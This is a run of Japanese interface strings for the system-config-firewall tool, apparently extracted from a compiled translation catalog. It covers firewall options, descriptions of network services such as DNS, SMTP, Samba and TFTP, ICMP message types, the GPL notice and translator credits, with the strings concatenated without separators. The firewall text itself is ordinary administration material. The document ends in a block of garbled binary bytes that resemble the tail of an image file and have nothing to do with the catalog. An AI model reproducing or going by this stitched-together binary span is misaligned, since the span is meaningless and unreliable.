openssh-server パッケヌゞをむンストヌルする必芁がありたす。安党な WWW (HTTPS)遞択ファむアりォヌル蚭定を理解しおいるか、カスタムルヌルを远加したいのならば<i>"゚キスパヌト"</i>を遞んでください。そうでなければ<i>"初心者"</i>を遞んでください。ファむルを遞択サヌバヌサヌビスサヌビス蚭定:ファむアりォヌルのデフォルトのタむプを %s ずしたす。既存の蚭定を䞊曞きしたす。このヘルプメッセヌゞを衚瀺したすバヌゞョンを衚瀺する送り元 (すべお必芁)゜ヌスク゚ンチ (Source Quench)ファむアりォヌルでデフォルトのルヌルの埌に取り蟌むカスタムルヌルファむルを指定したす。 デフォルトタむプ: ipv4、 デフォルトテヌブル: フィルタヌ。 (䟋: ipv4:filter:/etc/sysconfig/ipv4_filter_addon)操䜜ガむド機胜開始蚭定の操䜜ガむド機胜を開始する状態行番号察応しおいる icmp タむプ:ネットワヌクアクセスのないシステム
ネットワヌクアクセスのあるシステムTFTPTFTP クラむアントTODO衚Amanda バックアップクラむアントオプションは、Amanda バックアップずアヌカむブ化 サヌバヌにアクセスできるようにしたす。このオプションを圹立぀ようにするには、amanda-client パッケヌゞのむンストヌルが必芁です。ドメむン名システム (DNS) はホスト名ずドメむン名を䟛絊したり、芁求したりするために䜿甚されたす。(bind のような)ドメむン名サヌビスを提䟛するこずを予定しおいるのならばこのオプションを有効にしおください。SSL 䞊のむンタヌネットメッセヌゞアクセスプロトコル (IMAPs) によりロヌカルクラむアントがリモヌトサヌバヌの e メヌルに安党な方法でアクセスできたす。(dovecot のような) SSL 䞊の IMAP サヌビスの提䟛を予定しおいるのならばこのオプションを有効にしおください。むンタヌネット印刷プロトコル (IPP) は分散印刷に䜿甚されたす。 IPP (tcp 経由) はネットワヌク経由で耇数のプリンタヌを共有する機胜を提䟛したす。 ネットワヌク経由で cups を䜿甚しプリンタヌを共有する予定がある堎合はこのオプションを有効にしたす。むンタヌネット印刷プロトコル (IPP) は分散印刷に䜿甚されたす。 IPP (udp 経由) はプリンタヌに関する情報 (䟋えば胜力や状態) を取埗する機胜、 および印刷ゞョブを制埡する機胜を提䟛したす。 cups 経由でリモヌトネットワヌクプリンタヌを䜿甚する予定がある堎合はこのオプションを無効にしないでください。NFS4 プロトコルは TCP ネットワヌク経由でファむルを共甚するのに䜿甚されたす。このオプションが圹に立぀ようにするには、NFS ツヌルをむンストヌルしお、NFS サヌバヌを正しく蚭定する必芁がありたす。ポストオフィスプロトコルバヌゞョン 3 (POP3) は TCP/IP 接続でリモヌトサヌバヌから e メヌルを読み出すプロトコルです。(dovecot のような) POP3 サヌビスの提䟛を予定しおいるのならばこのオプションを有効にしおください。ナヌザヌサヌビスでのリモヌト認蚌ダむダル (RADIUS) はネットワヌク越えでのナヌザヌ認蚌のためのプロトコルです。おもにモデムや DSL、ワむダレスでのナヌザヌ認蚌に䜿われおいたす。(freeradius のような) RADIUS サヌビスの提䟛を予定しおいるのならばこのオプションを有効にしおください。Trivial File Transfer Protocol (TFTP) は簡玠な方法でリモヌトマシンずファむルを転送するのに䜿われるプロトコルです。通垞はディスクレスのワヌクステヌションを起動するために䜿われたす。ほかには Preboot eXecution Environment (PXE) でデヌタを転送するのに䜿われたす。ファむル '%s' は存圚したせん。ファむアりォヌルの蚭定に䞀貫性がありたせん。ファむアりォヌルは無効です。ファむアりォヌルは有効です。ファむアりォヌルテヌブル '%s' は有効ではありたせん。以䞋のファむルがないか、䜿甚できたせん:
	%s

この問題を蚂正するために、すぐにファむアりォヌルの蚭定を適甚しおください。プロトコルタむプ '%s' は有効ではありたせん。適甚されおいない倉曎がありたすが、本圓に終了したすか?この゚ラヌメッセヌゞは他のルヌトでパケットを送信するようにホストに 䌝えたす。この゚ラヌメッセヌゞは、宛先が到達䞍可の堎合にホスト、たたはゲヌトりェむによっお生成されたす。この゚ラヌメッセヌゞは、オプションが欠劂したり、䞍圓な長さであるなどで、 IP ヘッダヌが䞍正な堎合に生成されたす。この゚ラヌメッセヌゞは、パケット぀に぀いお、たたは分散したパケットの再構成に ぀いお残存時間が超過した堎合に生成されたす。この゚ラヌメッセヌゞは、パケット送信のペヌスを䜎枛するようにホストに 通達するために生成されたす。このメッセヌゞは <i>゚コヌ芁求</i> ぞの応答です。このメッセヌゞは、<i>ルヌタヌアドバタむズメント</i> を芁求する為にマルチキャストリンクに添付されおいるホストによっお䜿甚されたす。このメッセヌゞは、マルチキャストむンタヌフェむスの IP アドレスを 公衚するために定期的にルヌタヌによっお䜿甚されたす。このメッセヌゞは、ほずんどの堎合、ホストが <i>ping</i> ナヌティリティでネットワヌク間の疎通ができるかどうかをテストするのに䜿われたす。このオプションは Bacula サヌバヌがバックアップをスケゞュヌルするためにロヌカルマシンに 接続できるようにしたす。このオプションを利甚するには bacula クラむアントパッケヌゞをむンストヌルする必芁がありたす。これは来信の SMTP メヌル配送を蚱可したす。リモヌトホストをマシンに盎接接続しおメヌル配送の蚱可をする必芁がある堎合、このオプションを有効にしたす。POP3 や IMAP を䜿甚しお ISP のサヌバヌからメヌルを取埗する堎合や、fetchmail のようなツヌルを䜿甚する堎合はこれを有効にする必芁はありたせん。䞍適切な蚭定の SMTP サヌバヌは、リモヌトマシンにあなたのサヌバヌを䜿甚した spam 送信を蚱可しおしたうこずに泚意しおください。このオプションは Trivial File Transfer Protocol (TFTP) サヌビスぞのアクセスを蚱可したす。 このオプションを利甚するには tftp パッケヌゞをむンストヌルする必芁がありたす。このオプションは Windows のファむルずネットワヌクを共有するプリンタヌぞのアクセスを蚱可したす。 このオプションを利甚するには Samba クラむアントパッケヌゞをむンストヌルする必芁がありたす。これのオプションは Windows のファむルずプリンタヌの共有ネットワヌク内ぞのアクセスや参加を蚱可したす。このオプションが圹に立぀ようにするには Samba パッケヌゞをむンストヌルする必芁がありたす。このオプションは Red Hat Cluster Suite の利甚を蚱可したす。openais、ricci、dlm など甚のポヌトを開きたす。このオプションを䜿甚できるようにするには Red Hat Cluster Suite をむンストヌルする必芁がありたす。This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program.  If not, see <http://www.gnu.org/licenses/>.このプログラムはあなたのシステムの基本的なファむアりォヌル蚭定を手助けしたす。この操䜜ガむド機胜は、あなたのシステムの芁求のために正しいファむアりォヌル蚭定を行うこずを助けたす。時間超過宛先アドレス宛先ポヌト健党な状態を保぀ためにはファむアりォヌルの再起動や停止時にはカヌネルのファむアりォヌルモゞュヌルはアンロヌドされなければなりたせん。信頌したむンタヌフェむス:信頌したサヌビスタむプファむアりォヌルの再起動や停止時にモゞュヌルをアンロヌドするファむアりォヌルが有効ならば非察話的にファむアりォヌルを曎新したす。たた、ファむアりォヌルを再起動したす。-n ず -f オプションは無芖されたす。ファむアりォヌルに远加ルヌルを远加するため、カスタムルヌルファむルを䜿甚する。カスタムルヌルはデフォルトのルヌルの埌に远加される。ファむルは iptables で保存した圢匏でなければならない。ナヌザヌ定矩ナヌザヌの熟緎床远加のファむアりォヌルオプション無しでこれらのオプションを䜿甚しおも ファむアりォヌルの蚭定を䜜成したり倉曎したりしたせん。単に SELinux が 蚭定されたす。有効な倀: %s有効な倀: <port>[-<port>]、 ポヌトは数字 [0..65535] たたはサヌビス名になりたす。有効な倀: tcp、 udp冗長状態仮想マシン管理仮想マシン管理 (TLS)WWW (HTTP)譊告どのようなシステムを持っおいたすか?操䜜ガむド機胜はい<i>オプション</i> メニュヌの蚭定を埌で倉曎するこずができたす。ファむアりォヌルの蚭定が叀いバヌゞョンから倉換されたした。蚭定を確認し、適甚しおください。[<type>:][<table>:]<filename>情報(_A)ファむル(_F)ヘルプ(_H)オプション(_O)終了(_Q)蚭定の操䜜ガむド機胜を開始する(_S)蚭定if=<interface>:port=<port>:proto=<protocol>[:toport=<destination port>][:toaddr=<destination address>]無効なむンタヌフェむス '%s'䞍圓なポヌト定矩 %s 䞍圓なサヌビス '%s'IPv6 は NAT をサポヌトしおいたせん。ロヌカルmDNS により、暙準の DNS サヌバヌのない小さなネットワヌクで、DNS のプログラミングむンタヌフェむスや、パケットフォヌマット、操䜜セマンティクスを䜿甚できるようになりたす。Avahi を䜿甚する予定があるのならば、このオプションを無効にしおはいけたせん。倉曎されたラベルそのようなオプションはありたせん: %sオプション %(option)s: 䞍圓なフォワヌドポヌト '%(value)s'。オプション %(option)s: 䞍圓なフォワヌドポヌト '%(value)s': %(error)s。オプション %(option)s: 䞍圓な icmp タむプ '%(value)s'ポヌト範囲 '%s' は特有ではありたせん。system-config-firewallJames Hashida <khashida@redhat.com>,2002.Noriko Mizumoto <noriko@redhat.com>,2003.Naoki Shigematsu <sigematu@fedora.jp>,2004.Tadashi Jokagi <elf2000@users.sourceforge.net>,2004,2005.Hirofumi Saito <hi_saito@yk.rim.or.jp>, 2004, 2005, 2006.kiyoto james hashida <khashida@redhat.com>, 2006.日向原 韍䞀 <hyu_gabaru@yahoo.co.jp>, 2007, 2008. Hajime Taira <htaira@redhat.com>, 2010.ファむアりォヌルの蚭定䞀芧内の拒吊されるべき ICMP タむプをマヌクしたす。他のすべおの ICMP タむプは、ファむアりォヌルの通過が蚱可されたす。デフォルトでは制限されおいたせん。The Internet Control Message Protocol (ICMP) は、䞻にネットワヌク䞊のコンピュヌタ間で゚ラヌメッセヌゞを送信するために䜿われたす。たずえば、ping の芁求ず返答のようなメッセヌゞ情報です。ファむアりォヌルのルヌルを远加したカスタムルヌルファむルを䜿甚したす。远加のカスタムルヌルは、デフォルトのルヌルの埌に远蚘されたす。このファむルは、iptables-save 圢匏である必芁がありたす。
ß yôÊáœ~ŒorÀ5ÖJ™={þÁEÇêeŸu磝Qk®•ᯘG{÷?ù»ã+—]üôçƒÉÍ×ןô?wûM3X^¶Ú歌>{Ž7ÙŸìŽKã>èo²ÎnÝ\ÿªÊj¿y·ðR £õãg/î=ÞÿfúOçÖr·o×NVÊv¿ú~ÿY+ü¿NGêu÷ø·Ã®›þë¹HWŠûyëwÆ[eQ¶ÊšŸSÚb­Ö>öÍËÇþ³>ä}Gçmx[o[<ÞÚ{ðýŸÏ®_ÅïqF– ÚÛvMIEND®B`‚